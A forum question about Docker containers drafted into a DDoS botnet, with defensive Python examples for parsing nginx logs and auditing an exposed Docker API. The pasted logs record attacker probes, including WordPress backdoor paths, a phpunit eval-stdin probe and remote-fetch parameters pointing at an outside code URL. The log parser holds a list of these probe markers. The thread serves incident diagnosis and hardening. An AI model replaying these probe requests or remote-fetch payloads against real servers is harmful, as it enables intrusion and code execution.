Docker container part of a botnet via GET requests (DDoS)

Asked by: Ted Mosby Asked: 11/9/2021 Last edited by: Ted Mosby Updated: 11/11/2021 Views: 555

问:

Hi, I received a message from my provider saying that my server is part of a DDoS botnet. So I investigated my Docker containers and found some compromised containers (jitsi-meet-web (https://github.com/jitsi/docker-jitsi-meet), nextcloud (https://hub.docker.com/_/nextcloud) and an nginx container (https://hub.docker.com/_/nginx)). Someone tried to inject insecure WordPress files via GET requests.

My question is: how is this possible, and what can I do to prevent it from happening again?

The containers for Jira, Confluence and Oracle DB & ORDS are clean/fine.

My server runs as a reverse proxy.

Logs:

172.17.0.1 - - [16/Sep/2021:18:09:05 +0000] "GET /style.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:10 +0000] "GET /moduless.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:14 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:18 +0000] "GET /admin.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:22 +0000] "GET /index.php?3x=3x HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:24 +0000] "GET /boom.php?x HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:27 +0000] "GET /wp-content/plugins/backup_index.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:31 +0000] "GET /wp-content/db_cache.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:36 +0000] "GET /wp-content/plugins/ioptimization/IOptimize.php?rchk HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:39 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:42 +0000] "GET /wpindex.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:47 +0000] "GET /larva.php?idb=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:52 +0000] "GET /th3_err0r.php?php=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:56 +0000] "GET /alfindex.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:58 +0000] "GET /alfa.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:07 +0000] "GET /wp-booking.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:11 +0000] "GET /cindex.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:17 +0000] "GET /wp-content/wp-1ogin_bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:21 +0000] "GET /wp-1ogin_bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:26 +0000] "GET /wp-includes/fonts/css.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:32 +0000] "GET /wp-includes/css/css.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:37 +0000] "GET /old-index.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:43 +0000] "GET /config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:48 +0000] "GET /wp-admin/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:51 +0000] "GET /wp-content/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:10:56 +0000] "GET /wp-includes/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:01 +0000] "GET /wp-content/themes/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:05 +0000] "GET /wp-content/plugins/config.bak.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:13 +0000] "GET /wp-includes/css/wp-config.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:17 +0000] "GET /wp-content/plugins/ubh/up.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:21 +0000] "GET /wp-includes/wpconfig.bak.php?act=sf HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:25 +0000] "GET /wp-content/plugins/wpconfig.bak.php?act=sf HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:29 +0000] "GET /haders.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:32 +0000] "GET /wp-content/wp-old-index.php?action=login&pass=-1&submit= HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:39 +0000] "GET /legion.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:43 +0000] "GET /wp-content/mu-plugins/db-safe-mode.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:48 +0000] "GET /wp-includes/lfx.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:53 +0000] "GET /wp-includes/small.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:56 +0000] "GET /up.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:11:59 +0000] "GET /upload.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:03 +0000] "GET /config.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:05 +0000] "GET /test.php?ghost=send HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:09 +0000] "GET /wp-content/langar.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:17 +0000] "GET /wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:22 +0000] "GET /wp-content/plugins/wpdiscuz/themes/default/style-rtl.css HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "184.164.70.7"
107.189.3.183 - - [16/Sep/2021:18:42:21 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 154 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64" "-"

198.98.55.220 - - [10/Oct/2021:09:13:11 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 154 "-" "python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.35.1.el6.x86_64" "-"
172.17.0.1 - - [10/Oct/2021:09:15:43 +0000] "GET /wp-admin/css/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:15:55 +0000] "GET /.well-known/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:16:09 +0000] "GET /sites/default/files/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:16:30 +0000] "GET /admin/controller/extension/extension/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:16:41 +0000] "GET /uploads/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:16:50 +0000] "GET /images/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"
172.17.0.1 - - [10/Oct/2021:09:17:02 +0000] "GET /files/ HTTP/1.1" 404 556 "binance.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36" "23.146.241.19"

Tags: docker get code-injection ddos botnet
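Added example, not part of the question or of any answer: a small Python parser for the nginx image's default "main" log format used in the log above. Because the server is a reverse proxy, the first field is the Docker bridge gateway 172.17.0.1 and the real client only appears in the trailing X-Forwarded-For field; the script attributes 404 bursts and known probe paths to that real client. The sample lines are constructed from entries in the question's log plus one benign line with a documentation-range IP.

```python
import re
from collections import defaultdict

# Constructed sample in nginx's default "main" log_format: $remote_addr is the Docker
# bridge gateway, the real client sits in the last field ($http_x_forwarded_for).
SAMPLE_LOG = """\
172.17.0.1 - - [16/Sep/2021:18:09:14 +0000] "GET /wp-content/plugins/t_file_wp/t_file_wp.php?test=hello HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:09:39 +0000] "GET /xmlrp.php?url=https://raw.githubusercontent.com/carlosdechia/carlosdechia/main/ExV1 HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "184.164.70.7"
172.17.0.1 - - [16/Sep/2021:18:12:12 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 556 "anonymousfox.co" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" "184.164.70.7"
107.189.3.183 - - [16/Sep/2021:18:42:21 +0000] "POST /ws/v1/cluster/apps/new-application HTTP/1.1" 404 154 "-" "python-requests/2.6.0" "-"
172.17.0.1 - - [16/Sep/2021:18:50:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0" "203.0.113.7"
"""

LINE_RE = re.compile(
    r'^(?P<remote>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)

# Path fragments seen in the question's log: WordPress backdoor probes on a host that serves
# no WordPress, the phpunit eval-stdin probe, "?param=http..." remote-fetch attempts and the
# Hadoop YARN ResourceManager REST endpoint.
PROBE_MARKERS = ("/wp-", "eval-stdin.php", "=http", "/ws/v1/cluster/apps")

def parse_line(line):
    """Return the named fields of one access-log line, or None if it does not match."""
    return m.groupdict() if (m := LINE_RE.match(line)) else None

def client_ip(rec):
    """Real client behind the proxy: first X-Forwarded-For hop, else $remote_addr."""
    if rec["xff"] and rec["xff"] != "-":
        return rec["xff"].split(",")[0].strip()
    return rec["remote"]

def scan(log_text):
    """Count 404s and collect probe-like paths per real client IP."""
    per_ip = defaultdict(lambda: {"404": 0, "probes": []})
    for line in log_text.splitlines():
        if rec := parse_line(line):
            entry = per_ip[client_ip(rec)]
            if rec["status"] == "404":
                entry["404"] += 1
            if any(marker in rec["path"] for marker in PROBE_MARKERS):
                entry["probes"].append(rec["path"])
    return dict(per_ip)

def suspicious(per_ip, min_404=3):
    """Clients worth rate-limiting or blocking at the proxy: a 404 burst or any probe path."""
    return sorted(ip for ip, e in per_ip.items() if e["404"] >= min_404 or e["probes"])
```

Because the proxy hides the origin behind 172.17.0.1, blocking on the first field would never work; the trailing field is the one to feed to a firewall or fail2ban-style rule.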

Comments

0 upvotes David Maze 11/9/2021
It's hard to give very generic advice without seeing your application code. The two most common Docker things I see on SO are images that set up a non-root user but grant them unrestricted sudo permissions, and images that set up a non-root user but chown all of the code to that user; in some cases both of those allow the application to overwrite its own code.
0 upvotes Ted Mosby 11/10/2021
Thanks for the information, I added the repo URLs to my text. I will follow up on these leads. Can I assume that there may be a permission problem on the user/system side? Maybe on the folder side as well? I have mounted all important volumes of the Docker containers on my local system. Maybe I changed some permissions afterwards? Could that be the problem? I'm only asking because I'm looking for a precise lead. ;)

A:

0 upvotes Ted Mosby 11/11/2021 #1

Most likely the Docker REST API on port 2375 was used.

https://www.bleepingcomputer.com/news/security/teamtnt-hackers-target-your-poorly-configured-docker-servers/
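Added example tied to this answer (not the poster's code and not part of the Docker project): a Python audit of the two places dockerd takes its listen addresses from, the "hosts" key in /etc/docker/daemon.json and the -H/--host flags on the systemd ExecStart line, flagging any TCP listener on a non-loopback address that is not protected by tlsverify. The config strings are constructed samples.

```python
import json
import shlex

# Constructed configs (not from the question). dockerd only listens on TCP when told to,
# via "hosts" in daemon.json or "-H tcp://..." on its ExecStart line; setting "hosts" in
# both places makes dockerd refuse to start, which is a common outcome of a botched edit.
EXPOSED_DAEMON_JSON = '{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]}'
SAFE_DAEMON_JSON = ('{"hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"], '
                    '"tlsverify": true, "tlscacert": "/etc/docker/ca.pem"}')
EXPOSED_EXECSTART = "ExecStart=/usr/bin/dockerd -H fd:// -H tcp://0.0.0.0:2375"

LOOPBACK_PREFIXES = ("127.", "localhost", "[::1]")

def hosts_from_json(text):
    """Return (hosts, tlsverify) declared in a daemon.json document (empty text = none)."""
    cfg = json.loads(text) if text.strip() else {}
    return list(cfg.get("hosts", [])), bool(cfg.get("tlsverify"))

def hosts_from_execstart(line):
    """Return (hosts, tlsverify) from a systemd ExecStart= line or a bare dockerd command."""
    args = shlex.split(line.split("=", 1)[1] if line.startswith("ExecStart=") else line)
    hosts, tlsverify = [], any(a in ("--tlsverify", "--tlsverify=true") for a in args)
    it = iter(args)
    for a in it:
        if a in ("-H", "--host"):
            hosts.append(next(it, ""))
        elif a.startswith(("-H=", "--host=")):
            hosts.append(a.split("=", 1)[1])
    return hosts, tlsverify

def audit(daemon_json_text="", execstart_line=""):
    """Return (finding, host) pairs for every TCP listener dockerd would open."""
    j_hosts, j_tls = hosts_from_json(daemon_json_text)
    e_hosts, e_tls = hosts_from_execstart(execstart_line)
    findings = []
    if j_hosts and e_hosts:
        findings.append(("CONFLICT: hosts set in both daemon.json and ExecStart", ""))
    tls = j_tls or e_tls
    for host in j_hosts + e_hosts:
        if not host.startswith("tcp://"):
            continue  # unix:// and fd:// sockets are not reachable from the network
        addr = host[len("tcp://"):]
        if addr.startswith(LOOPBACK_PREFIXES):
            findings.append(("OK: loopback only", host))
        elif tls:
            findings.append(("EXPOSED: TCP listener, TLS client auth required", host))
        else:
            findings.append(("CRITICAL: unauthenticated Docker API reachable from the network", host))
    return findings
```

An unauthenticated TCP listener is root on the host for anyone who can reach it, so the fix is to drop the tcp:// host entirely (keep the unix socket) or, if remote access is really needed, require tlsverify and restrict the port at the firewall.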